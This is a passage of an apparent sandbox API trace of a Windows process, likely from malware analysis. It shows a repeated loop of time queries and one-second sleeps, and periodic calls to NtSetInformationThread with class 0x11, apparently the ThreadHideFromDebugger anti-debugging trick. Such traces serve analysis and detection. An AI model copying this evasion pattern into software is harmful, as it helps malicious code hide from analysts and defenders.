(in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x34, wMilliseconds=0x219)) [0155.105] GetTickCount () returned 0x1167c4c [0155.105] Sleep (dwMilliseconds=0x3e8) [0156.208] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x35, wMilliseconds=0x278)) [0156.209] GetTickCount () returned 0x1168091 [0156.209] Sleep (dwMilliseconds=0x3e8) [0157.250] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x36, wMilliseconds=0x2a7)) [0157.250] GetTickCount () returned 0x11684a8 [0157.250] Sleep (dwMilliseconds=0x3e8) [0158.325] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x37, wMilliseconds=0x2f5)) [0158.325] GetTickCount () returned 0x11688de [0158.325] Sleep (dwMilliseconds=0x3e8) [0159.450] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x38, wMilliseconds=0x372)) [0159.450] GetTickCount () returned 0x1168d43 [0159.450] Sleep (dwMilliseconds=0x3e8) [0160.626] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x3a, wMilliseconds=0x39)) [0160.626] GetTickCount () returned 0x11691e7 [0160.626] Sleep (dwMilliseconds=0x3e8) [0161.636] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x3b, wMilliseconds=0x40)) [0161.636] GetTickCount () returned 0x11695cf [0161.636] Sleep (dwMilliseconds=0x3e8) [0162.698] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x0, wMilliseconds=0x7e)) [0162.698] GetTickCount () returned 0x11699f5 [0162.698] Sleep (dwMilliseconds=0x3e8) [0163.717] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1, wMilliseconds=0x8e)) [0163.717] GetTickCount () returned 0x1169ded [0163.717] Sleep (dwMilliseconds=0x3e8) [0164.745] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2, wMilliseconds=0xad)) [0164.746] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0164.746] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0164.746] GetCurrentThread () returned 0xfffffffe [0164.746] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0164.747] GetTickCount () returned 0x116a1f4 [0164.747] Sleep (dwMilliseconds=0x3e8) [0165.977] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x3, wMilliseconds=0x192)) [0165.977] GetTickCount () returned 0x116a6c7 [0165.977] Sleep (dwMilliseconds=0x3e8) [0167.135] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x4, wMilliseconds=0x22e)) [0167.135] GetTickCount () returned 0x116ab4b [0167.135] Sleep (dwMilliseconds=0x3e8) [0168.223] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x5, wMilliseconds=0x28c)) [0168.224] GetTickCount () returned 0x116af91 [0168.224] Sleep (dwMilliseconds=0x3e8) [0169.238] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x6, wMilliseconds=0x29b)) [0169.238] GetTickCount () returned 0x116b388 [0169.238] Sleep (dwMilliseconds=0x3e8) [0170.305] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x7, wMilliseconds=0x2da)) [0170.305] GetTickCount () returned 0x116b7af [0170.305] Sleep (dwMilliseconds=0x3e8) [0171.318] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x8, wMilliseconds=0x2e8)) [0171.318] GetTickCount () returned 0x116bb97 [0171.318] Sleep (dwMilliseconds=0x3e8) [0172.327] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x9, wMilliseconds=0x2ef)) [0172.328] GetTickCount () returned 0x116bf8e [0172.328] Sleep (dwMilliseconds=0x3e8) [0173.368] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xa, wMilliseconds=0x31e)) [0173.368] GetTickCount () returned 0x116c3a5 [0173.368] Sleep (dwMilliseconds=0x3e8) [0174.424] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xb, wMilliseconds=0x34d)) [0174.424] GetTickCount () returned 0x116c7bc [0174.424] Sleep (dwMilliseconds=0x3e8) [0175.443] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xc, wMilliseconds=0x35d)) [0175.445] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0175.445] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0175.445] GetCurrentThread () returned 0xfffffffe [0175.445] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0175.445] GetTickCount () returned 0x116cbc3 [0175.445] Sleep (dwMilliseconds=0x3e8) [0176.456] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xd, wMilliseconds=0x375)) [0176.456] GetTickCount () returned 0x116cfab [0176.456] Sleep (dwMilliseconds=0x3e8) [0177.515] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xe, wMilliseconds=0x3b3)) [0177.515] GetTickCount () returned 0x116d3d2 [0177.515] Sleep (dwMilliseconds=0x3e8) [0178.562] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0xf, wMilliseconds=0x3e2)) [0178.562] GetTickCount () returned 0x116d7e9 [0178.562] Sleep (dwMilliseconds=0x3e8) [0179.596] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x11, wMilliseconds=0x19)) [0179.596] GetTickCount () returned 0x116dbf0 [0179.596] Sleep (dwMilliseconds=0x3e8) [0180.703] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x12, wMilliseconds=0x87)) [0180.703] GetTickCount () returned 0x116e045 [0180.703] Sleep (dwMilliseconds=0x3e8) [0181.838] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x13, wMilliseconds=0x103)) [0181.838] GetTickCount () returned 0x116e4aa [0181.838] Sleep (dwMilliseconds=0x3e8) [0182.904] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x14, wMilliseconds=0x151)) [0182.904] GetTickCount () returned 0x116e8e1 [0182.904] Sleep (dwMilliseconds=0x3e8) [0183.954] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x15, wMilliseconds=0x180)) [0183.954] GetTickCount () returned 0x116ecf7 [0183.954] Sleep (dwMilliseconds=0x3e8) [0184.968] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x16, wMilliseconds=0x18f)) [0184.968] GetTickCount () returned 0x116f0ef [0184.968] Sleep (dwMilliseconds=0x3e8) [0186.016] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x17, wMilliseconds=0x1bf)) [0186.016] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0186.016] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0186.016] GetCurrentThread () returned 0xfffffffe [0186.016] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0186.017] GetTickCount () returned 0x116f506 [0186.017] Sleep (dwMilliseconds=0x3e8) [0187.110] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x18, wMilliseconds=0x21d)) [0187.110] GetTickCount () returned 0x116f94c [0187.110] Sleep (dwMilliseconds=0x3e8) [0188.273] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x19, wMilliseconds=0x2b9)) [0188.273] GetTickCount () returned 0x116fdd0 [0188.273] Sleep (dwMilliseconds=0x3e8) [0189.344] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1a, wMilliseconds=0x307)) [0189.344] GetTickCount () returned 0x1170206 [0189.344] Sleep (dwMilliseconds=0x3e8) [0190.399] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1b, wMilliseconds=0x336)) [0190.399] GetTickCount () returned 0x117061d [0190.399] Sleep (dwMilliseconds=0x3e8) [0191.439] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1c, wMilliseconds=0x367)) [0191.439] GetTickCount () returned 0x1170a43 [0191.439] Sleep (dwMilliseconds=0x3e8) [0192.524] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1d, wMilliseconds=0x3b4)) [0192.524] GetTickCount () returned 0x1170e7a [0192.525] Sleep (dwMilliseconds=0x3e8) [0193.548] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x1e, wMilliseconds=0x3d3)) [0193.548] GetTickCount () returned 0x1171281 [0193.548] Sleep (dwMilliseconds=0x3e8) [0194.633] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x20, wMilliseconds=0x39)) [0194.633] GetTickCount () returned 0x11716b7 [0194.633] Sleep (dwMilliseconds=0x3e8) [0195.657] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x21, wMilliseconds=0x59)) [0195.657] GetTickCount () returned 0x1171abe [0195.657] Sleep (dwMilliseconds=0x3e8) [0196.766] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x22, wMilliseconds=0xc6)) [0196.767] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0196.768] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0196.769] GetCurrentThread () returned 0xfffffffe [0196.769] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0196.770] GetTickCount () returned 0x1171f14 [0196.770] Sleep (dwMilliseconds=0x3e8) [0197.851] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x23, wMilliseconds=0x114)) [0197.851] GetTickCount () returned 0x117234a [0197.851] Sleep (dwMilliseconds=0x3e8) [0198.900] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x24, wMilliseconds=0x143)) [0198.900] GetTickCount () returned 0x1172761 [0198.900] Sleep (dwMilliseconds=0x3e8) [0199.914] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x25, wMilliseconds=0x154)) [0199.914] GetTickCount () returned 0x1172b58 [0199.914] Sleep (dwMilliseconds=0x3e8) [0200.949] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x26, wMilliseconds=0x17e)) [0200.950] GetTickCount () returned 0x1172f5f [0200.950] Sleep (dwMilliseconds=0x3e8) [0201.974] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x27, wMilliseconds=0x197)) [0201.974] GetTickCount () returned 0x1173367 [0201.974] Sleep (dwMilliseconds=0x3e8) [0202.986] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x28, wMilliseconds=0x19a)) [0202.987] GetTickCount () returned 0x117374f [0202.987] Sleep (dwMilliseconds=0x3e8) [0204.007] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x29, wMilliseconds=0x1aa)) [0204.008] GetTickCount () returned 0x1173b46 [0204.008] Sleep (dwMilliseconds=0x3e8) [0205.293] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2a, wMilliseconds=0x2d3)) [0205.293] GetTickCount () returned 0x1174057 [0205.293] Sleep (dwMilliseconds=0x3e8) [0206.305] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2b, wMilliseconds=0x2dd)) [0206.305] GetTickCount () returned 0x117444f [0206.305] Sleep (dwMilliseconds=0x3e8) [0207.338] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2c, wMilliseconds=0x2fc)) [0207.339] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0207.339] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0207.340] GetCurrentThread () returned 0xfffffffe [0207.340] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0207.340] GetTickCount () returned 0x1174856 [0207.340] Sleep (dwMilliseconds=0x3e8) [0208.501] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2d, wMilliseconds=0x399)) [0208.502] GetTickCount () returned 0x1174cda [0208.502] Sleep (dwMilliseconds=0x3e8) [0209.570] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x2e, wMilliseconds=0x3e7)) [0209.571] GetTickCount () returned 0x1175110 [0209.571] Sleep (dwMilliseconds=0x3e8) [0210.601] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x30, wMilliseconds=0x20)) [0210.601] GetTickCount () returned 0x1175518 [0210.601] Sleep (dwMilliseconds=0x3e8) [0211.649] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x31, wMilliseconds=0x48)) [0211.649] GetTickCount () returned 0x117591f [0211.649] Sleep (dwMilliseconds=0x3e8) [0212.662] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x32, wMilliseconds=0x5e)) [0212.662] GetTickCount () returned 0x1175d26 [0212.662] Sleep (dwMilliseconds=0x3e8) [0213.695] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x33, wMilliseconds=0x7e)) [0213.695] GetTickCount () returned 0x117612d [0213.695] Sleep (dwMilliseconds=0x3e8) [0214.710] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x34, wMilliseconds=0x8d)) [0214.710] GetTickCount () returned 0x1176525 [0214.710] Sleep (dwMilliseconds=0x3e8) [0215.726] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x35, wMilliseconds=0x9d)) [0215.726] GetTickCount () returned 0x117691d [0215.726] Sleep (dwMilliseconds=0x3e8) [0216.735] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x36, wMilliseconds=0xa5)) [0216.735] GetTickCount () returned 0x1176d05 [0216.735] Sleep (dwMilliseconds=0x3e8) [0217.749] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x37, wMilliseconds=0xb5)) [0217.751] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0217.751] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0217.752] GetCurrentThread () returned 0xfffffffe [0217.752] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0217.752] GetTickCount () returned 0x11770fc [0217.753] Sleep (dwMilliseconds=0x3e8) [0218.813] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x38, wMilliseconds=0xf3)) [0218.813] GetTickCount () returned 0x1177523 [0218.813] Sleep (dwMilliseconds=0x3e8) [0219.827] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x39, wMilliseconds=0x103)) [0219.827] GetTickCount () returned 0x117791a [0219.827] Sleep (dwMilliseconds=0x3e8) [0220.843] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x3a, wMilliseconds=0x113)) [0220.843] GetTickCount () returned 0x1177d12 [0220.843] Sleep (dwMilliseconds=0x3e8) [0221.873] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x3b, wMilliseconds=0x12a)) [0221.874] GetTickCount () returned 0x1178119 [0221.874] Sleep (dwMilliseconds=0x3e8) [0222.882] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x0, wMilliseconds=0x13a)) [0222.882] GetTickCount () returned 0x1178511 [0222.882] Sleep (dwMilliseconds=0x3e8) [0223.899] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1, wMilliseconds=0x14a)) [0223.899] GetTickCount () returned 0x1178909 [0223.899] Sleep (dwMilliseconds=0x3e8) [0224.913] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2, wMilliseconds=0x15a)) [0224.913] GetTickCount () returned 0x1178d00 [0224.913] Sleep (dwMilliseconds=0x3e8) [0225.931] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x3, wMilliseconds=0x169)) [0225.932] GetTickCount () returned 0x11790f8 [0225.932] Sleep (dwMilliseconds=0x3e8) [0226.947] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x4, wMilliseconds=0x17a)) [0226.948] GetTickCount () returned 0x11794ef [0226.948] Sleep (dwMilliseconds=0x3e8) [0227.993] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x5, wMilliseconds=0x1a9)) [0227.994] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0227.995] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0227.995] GetCurrentThread () returned 0xfffffffe [0227.995] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0227.995] GetTickCount () returned 0x1179906 [0227.995] Sleep (dwMilliseconds=0x3e8) [0229.149] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x6, wMilliseconds=0x245)) [0229.150] GetTickCount () returned 0x1179d8b [0229.150] Sleep (dwMilliseconds=0x3e8) [0230.184] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x7, wMilliseconds=0x265)) [0230.184] GetTickCount () returned 0x117a192 [0230.184] Sleep (dwMilliseconds=0x3e8) [0231.235] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x8, wMilliseconds=0x29b)) [0231.235] GetTickCount () returned 0x117a5b8 [0231.235] Sleep (dwMilliseconds=0x3e8) [0232.287] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x9, wMilliseconds=0x2ca)) [0232.287] GetTickCount () returned 0x117a9cf [0232.287] Sleep (dwMilliseconds=0x3e8) [0233.303] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xa, wMilliseconds=0x2df)) [0233.303] GetTickCount () returned 0x117adc7 [0233.303] Sleep (dwMilliseconds=0x3e8) [0234.333] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xb, wMilliseconds=0x2fe)) [0234.333] GetTickCount () returned 0x117b1ce [0234.333] Sleep (dwMilliseconds=0x3e8) 